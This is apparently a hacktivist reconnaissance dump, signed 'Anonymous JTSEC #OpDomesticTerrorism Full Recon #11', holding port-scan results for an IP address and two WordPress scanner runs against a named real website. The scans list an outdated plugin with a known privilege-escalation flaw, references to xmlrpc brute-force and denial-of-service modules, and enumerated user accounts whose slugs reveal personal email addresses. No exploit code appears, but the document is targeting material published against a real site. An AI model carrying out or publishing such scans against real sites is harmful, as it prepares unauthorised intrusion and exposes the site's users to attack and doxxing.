3212. 195.55.47.89 53 udp domain unknown
3213. 195.55.47.89 67 udp dhcps unknown
3214. 195.55.47.89 68 udp dhcpc unknown
3215. 195.55.47.89 69 udp tftp unknown
3216. 195.55.47.89 80 tcp http-proxy open Squid http proxy
3217. 195.55.47.89 88 udp kerberos-sec unknown
3218. 195.55.47.89 113 tcp ident closed
3219. 195.55.47.89 123 udp ntp unknown
3220. 195.55.47.89 137 udp netbios-ns filtered
3221. 195.55.47.89 138 udp netbios-dgm filtered
3222. 195.55.47.89 139 tcp netbios-ssn closed
3223. 195.55.47.89 139 udp netbios-ssn unknown
3224. 195.55.47.89 161 udp snmp unknown
3225. 195.55.47.89 162 udp snmptrap unknown
3226. 195.55.47.89 389 udp ldap unknown
3227. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
3228. 195.55.47.89 445 tcp microsoft-ds closed
3229. 195.55.47.89 520 udp route unknown
3230. 195.55.47.89 2049 udp nfs unknown
3231. #######################################################################################################################################
3232. [+] URL: http://theredelephants.com/
3233. [+] Started: Wed Nov 7 23:17:01 2018
3234.  
3235. Interesting Finding(s):
3236.  
3237. [+] http://theredelephants.com/
3238. | Interesting Entries:
3239. | - WPE-Backend: apache
3240. | - X-Cacheable: SHORT
3241. | - X-Pass-Why:
3242. | - X-Cache-Group: normal
3243. | - X-Type: default
3244. | Found By: Headers (Passive Detection)
3245. | Confidence: 100%
3246.  
3247. [+] http://theredelephants.com/robots.txt
3248. | Interesting Entries:
3249. | - /wp-admin/
3250. | - /wp-admin/admin-ajax.php
3251. | Found By: Robots Txt (Aggressive Detection)
3252. | Confidence: 100%
3253.  
3254. [+] http://theredelephants.com/xmlrpc.php
3255. | Found By: Link Tag (Passive Detection)
3256. | Confidence: 100%
3257. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
3258. | References:
3259. | - http://codex.wordpress.org/XML-RPC_Pingback_API
3260. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
3261. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
3262. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
3263. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
3264.  
3265. [+] This site has 'Must Use Plugins': http://theredelephants.com/wp-content/mu-plugins/
3266. | Found By: Direct Access (Aggressive Detection)
3267. | Confidence: 80%
3268. | Reference: http://codex.wordpress.org/Must_Use_Plugins
3269.  
3270. [+] WordPress version 4.9.8 identified (Released on 2018-08-02).
3271. | Detected By: Rss Generator (Passive Detection)
3272. | - http://theredelephants.com/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
3273. | - http://theredelephants.com/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
3274.  
3275. [+] WordPress theme in use: Newspaper
3276. | Location: http://theredelephants.com/wp-content/themes/Newspaper/
3277. | Readme: http://theredelephants.com/wp-content/themes/Newspaper/readme.txt
3278. | Style URL: http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2
3279. | Style Name: Newspaper
3280. | Style URI: http://tagdiv.com
3281. | Description: Premium wordpress template, clean and easy to use....
3282. | Author: tagDiv
3283. | Author URI: http://themeforest.net/user/tagDiv/portfolio
3284. |
3285. | Detected By: Css Style (Passive Detection)
3286. |
3287. | Version: 8.1.2 (80% confidence)
3288. | Detected By: Style (Passive Detection)
3289. | - http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2, Match: 'Version: 8.1.2'
3290.  
3291. [+] Enumerating All Plugins
3292. [+] Checking Plugin Versions
3293.  
3294. [i] Plugin(s) Identified:
3295.  
3296. [+] contact-form-7
3297. | Location: http://theredelephants.com/wp-content/plugins/contact-form-7/
3298. | Last Updated: 2018-10-29T23:58:00.000Z
3299. | [!] The version is out of date, the latest version is 5.0.5
3300. |
3301. | Detected By: Urls In Homepage (Passive Detection)
3302. |
3303. | [!] 1 vulnerability identified:
3304. |
3305. | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
3306. | Fixed in: 5.0.4
3307. | References:
3308. | - https://wpvulndb.com/vulnerabilities/9127
3309. | - https://contactform7.com/2018/09/04/contact-form-7-504/
3310. | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
3311. | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
3312. | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
3313. | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
3314. |
3315. | Version: 4.9.1 (100% confidence)
3316. | Detected By: Query Parameter (Passive Detection)
3317. | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1
3318. | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1
3319. | Confirmed By:
3320. | Readme - Stable Tag (Aggressive Detection)
3321. | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
3322. | Readme - ChangeLog Section (Aggressive Detection)
3323. | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
3324.  
3325. [+] js_composer
3326. | Location: http://theredelephants.com/wp-content/plugins/js_composer/
3327. |
3328. | Detected By: Urls In Homepage (Passive Detection)
3329. | Confirmed By: Body Tag (Passive Detection)
3330. |
3331. | Version: 5.4.2 (70% confidence)
3332. | Detected By: Query Parameter (Passive Detection)
3333. | - http://theredelephants.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.2
3334. | Confirmed By: Body Tag (Passive Detection)
3335. | - http://theredelephants.com/, Match: 'js-comp-ver-5.4.2'
3336.  
3337. [+] mashsharer
3338. | Location: http://theredelephants.com/wp-content/plugins/mashsharer/
3339. | Last Updated: 2018-10-15T11:18:00.000Z
3340. | [!] The version is out of date, the latest version is 3.5.5
3341. |
3342. | Detected By: Urls In Homepage (Passive Detection)
3343. | Confirmed By:
3344. | Graph Meta Tags Comment (Passive Detection)
3345. | Twitter Card Comment (Passive Detection)
3346. |
3347. | Version: 3.4.6 (100% confidence)
3348. | Detected By: Twitter Card Comment (Passive Detection)
3349. | - http://theredelephants.com/, Match: 'Twitter Card generated by MashShare 3.4.6'
3350. | Confirmed By:
3351. | Query Parameter (Passive Detection)
3352. | - http://theredelephants.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.4.6
3353. | - http://theredelephants.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.4.6
3354. | Graph Meta Tags Comment (Passive Detection)
3355. | - http://theredelephants.com/, Match: 'Graph Meta Tags generated by MashShare 3.4.6'
3356.  
3357. [+] theia-sticky-sidebar
3358. | Location: http://theredelephants.com/wp-content/plugins/theia-sticky-sidebar/
3359. |
3360. | Detected By: Urls In Homepage (Passive Detection)
3361. |
3362. | The version could not be determined.
3363.  
3364. [+] vc-post-grid-addon
3365. | Location: http://theredelephants.com/wp-content/plugins/vc-post-grid-addon/
3366. |
3367. | Detected By: Urls In Homepage (Passive Detection)
3368. |
3369. | The version could not be determined.
3370.  
3371. [+] wordpress-seo
3372. | Location: http://theredelephants.com/wp-content/plugins/wordpress-seo/
3373. | Last Updated: 2018-11-06T09:26:00.000Z
3374. | [!] The version is out of date, the latest version is 9.1
3375. |
3376. | Detected By: Comment (Passive Detection)
3377. |
3378. | Version: 5.8 (100% confidence)
3379. | Detected By: Comment (Passive Detection)
3380. | - http://theredelephants.com/, Match: 'optimized with the Yoast SEO plugin v5.8 -'
3381. | Confirmed By:
3382. | Readme - Stable Tag (Aggressive Detection)
3383. | - http://theredelephants.com/wp-content/plugins/wordpress-seo/readme.txt
3384. | Readme - ChangeLog Section (Aggressive Detection)
3385. | - http://theredelephants.com/wp-content/plugins/wordpress-seo/readme.txt
3386.  
3387. [+] wp-progression-player
3388. | Location: http://theredelephants.com/wp-content/plugins/wp-progression-player/
3389. |
3390. | Detected By: Urls In Homepage (Passive Detection)
3391. |
3392. | Version: 1.0.0 (100% confidence)
3393. | Detected By: Readme - Stable Tag (Aggressive Detection)
3394. | - http://theredelephants.com/wp-content/plugins/wp-progression-player/README.txt
3395. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
3396. | - http://theredelephants.com/wp-content/plugins/wp-progression-player/README.txt
3397.  
3398. [+] Enumerating Config Backups
3399. Checking Config Backups - Time: 00:00:05 <===> (21 / 21) 100.00% Time: 00:00:05
3400.  
3401. [i] No Config Backups Found.
3402.  
3403. [+] Finished: Wed Nov 7 23:17:56 2018
3404. [+] Requests Done: 73
3405. [+] Cached Requests: 5
3406. [+] Data Sent: 17.063 KB
3407. [+] Data Received: 4.475 MB
3408. [+] Memory used: 71.684 MB
3409. [+] Elapsed time: 00:00:55
3410. #######################################################################################################################################
3411. [+] URL: http://theredelephants.com/
3412. [+] Started: Wed Nov 7 23:19:30 2018
3413.  
3414. Interesting Finding(s):
3415.  
3416. [+] http://theredelephants.com/
3417. | Interesting Entries:
3418. | - WPE-Backend: apache
3419. | - X-Cacheable: SHORT
3420. | - X-Pass-Why:
3421. | - X-Cache-Group: normal
3422. | - X-Type: default
3423. | Found By: Headers (Passive Detection)
3424. | Confidence: 100%
3425.  
3426. [+] http://theredelephants.com/robots.txt
3427. | Interesting Entries:
3428. | - /wp-admin/
3429. | - /wp-admin/admin-ajax.php
3430. | Found By: Robots Txt (Aggressive Detection)
3431. | Confidence: 100%
3432.  
3433. [+] http://theredelephants.com/xmlrpc.php
3434. | Found By: Link Tag (Passive Detection)
3435. | Confidence: 100%
3436. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
3437. | References:
3438. | - http://codex.wordpress.org/XML-RPC_Pingback_API
3439. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
3440. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
3441. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
3442. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
3443.  
3444. [+] This site has 'Must Use Plugins': http://theredelephants.com/wp-content/mu-plugins/
3445. | Found By: Direct Access (Aggressive Detection)
3446. | Confidence: 80%
3447. | Reference: http://codex.wordpress.org/Must_Use_Plugins
3448.  
3449. [+] WordPress version 4.9.8 identified (Released on 2018-08-02).
3450. | Detected By: Rss Generator (Passive Detection)
3451. | - http://theredelephants.com/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
3452. | - http://theredelephants.com/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
3453.  
3454. [+] WordPress theme in use: Newspaper
3455. | Location: http://theredelephants.com/wp-content/themes/Newspaper/
3456. | Readme: http://theredelephants.com/wp-content/themes/Newspaper/readme.txt
3457. | Style URL: http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2
3458. | Style Name: Newspaper
3459. | Style URI: http://tagdiv.com
3460. | Description: Premium wordpress template, clean and easy to use....
3461. | Author: tagDiv
3462. | Author URI: http://themeforest.net/user/tagDiv/portfolio
3463. |
3464. | Detected By: Css Style (Passive Detection)
3465. |
3466. | Version: 8.1.2 (80% confidence)
3467. | Detected By: Style (Passive Detection)
3468. | - http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2, Match: 'Version: 8.1.2'
3469.  
3470. [+] Enumerating Vulnerable Plugins
3471. [+] Checking Plugin Versions
3472.  
3473. [i] Plugin(s) Identified:
3474.  
3475. [+] contact-form-7
3476. | Location: http://theredelephants.com/wp-content/plugins/contact-form-7/
3477. | Last Updated: 2018-10-29T23:58:00.000Z
3478. | [!] The version is out of date, the latest version is 5.0.5
3479. |
3480. | Detected By: Urls In Homepage (Passive Detection)
3481. |
3482. | [!] 1 vulnerability identified:
3483. |
3484. | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
3485. | Fixed in: 5.0.4
3486. | References:
3487. | - https://wpvulndb.com/vulnerabilities/9127
3488. | - https://contactform7.com/2018/09/04/contact-form-7-504/
3489. | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
3490. | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
3491. | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
3492. | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
3493. |
3494. | Version: 4.9.1 (100% confidence)
3495. | Detected By: Query Parameter (Passive Detection)
3496. | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1
3497. | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1
3498. | Confirmed By:
3499. | Readme - Stable Tag (Aggressive Detection)
3500. | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
3501. | Readme - ChangeLog Section (Aggressive Detection)
3502. | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
3503.  
3504. [+] Enumerating Vulnerable Themes
3505. Checking Known Locations - Time: 00:01:37 <> (287 / 287) 100.00% Time: 00:01:37
3506. [+] Checking Theme Versions
3507.  
3508. [i] No themes Found.
3509.  
3510. [i] No Timthumbs Found.
3511.  
3512. [+] Enumerating Config Backups
3513. Checking Config Backups - Time: 00:00:04 <===> (21 / 21) 100.00% Time: 00:00:04
3514.  
3515. [i] No Config Backups Found.
3516.  
3517. [+] Enumerating DB Exports
3518. Checking DB Exports - Time: 00:00:02 <=======> (36 / 36) 100.00% Time: 00:00:02
3519.  
3520. [i] No DB Exports Found.
3521.  
3522. [i] No Medias Found.
3523.  
3524. [+] Enumerating Users
3525. Brute Forcing Author IDs - Time: 00:00:02 <==> (10 / 10) 100.00% Time: 00:00:02
3526.  
3527. [i] User(s) Identified:
3528.  
3529. [+] Austin Rucker
3530. | Detected By: Rss Generator (Passive Detection)
3531. | Confirmed By: Rss Generator (Aggressive Detection)
3532.  
3533. [+] Vincent James
3534. | Detected By: Rss Generator (Passive Detection)
3535. | Confirmed By: Rss Generator (Aggressive Detection)
3536.  
3537. [+] amandaleighmossgmail-com
3538. | Detected By: Wp Json Api (Aggressive Detection)
3539. | - http://theredelephants.com/wp-json/wp/v2/users/
3540.  
3541. [+] austinnealruckergmail-com
3542. | Detected By: Wp Json Api (Aggressive Detection)
3543. | - http://theredelephants.com/wp-json/wp/v2/users/
3544.  
3545. [+] chad-corpyahoo-com
3546. | Detected By: Wp Json Api (Aggressive Detection)
3547. | - http://theredelephants.com/wp-json/wp/v2/users/
3548.  
3549. [+] davidschellcomcast-net
3550. | Detected By: Wp Json Api (Aggressive Detection)
3551. | - http://theredelephants.com/wp-json/wp/v2/users/
3552.  
3553. [+] emilyhemingway2gmail-com
3554. | Detected By: Wp Json Api (Aggressive Detection)
3555. | - http://theredelephants.com/wp-json/wp/v2/users/
3556.  
3557. [+] infodynamicdreamz-com
3558. | Detected By: Wp Json Api (Aggressive Detection)
3559. | - http://theredelephants.com/wp-json/wp/v2/users/
3560.  
3561. [+] johnnymaga1988gmail-com
3562. | Detected By: Wp Json Api (Aggressive Detection)
3563. | - http://theredelephants.com/wp-json/wp/v2/users/
3564.  
3565. [+] awhiterrabettgmail-com
3566. | Detected By: Wp Json Api (Aggressive Detection)
3567. | - http://theredelephants.com/wp-json/wp/v2/users/
3568.  
3569. [+] sixgunstrattongmail-com
3570. | Detected By: Wp Json Api (Aggressive Detection)
3571. | - http://theredelephants.com/wp-json/wp/v2/users/
3572.  
3573. [+] megfischerlive-com
3574. | Detected By: Wp Json Api (Aggressive Detection)
3575. | - http://theredelephants.com/wp-json/wp/v2/users/
3576.  
3577. [+] windycityfan
3578. | Detected By: Oembed API - Author URL (Aggressive Detection)
3579. | - http://theredelephants.com/wp-json/oembed/1.0/embed?url=http://theredelephants.com/&format=json
3580.  
3581. [+] Finished: Wed Nov 7 23:35:59 2018
3582. [+] Requests Done: 3034
3583. [+] Cached Requests: 58
3584. [+] Data Sent: 811.64 KB
3585. [+] Data Received: 195.966 MB
3586. [+] Memory used: 215.688 MB
3587. [+] Elapsed time: 00:16:28
3588. =======================================================================================================================================
3589. #######################################################################################################################################
3590. Anonymous JTSEC #OpDomesticTerrorism Full Recon #11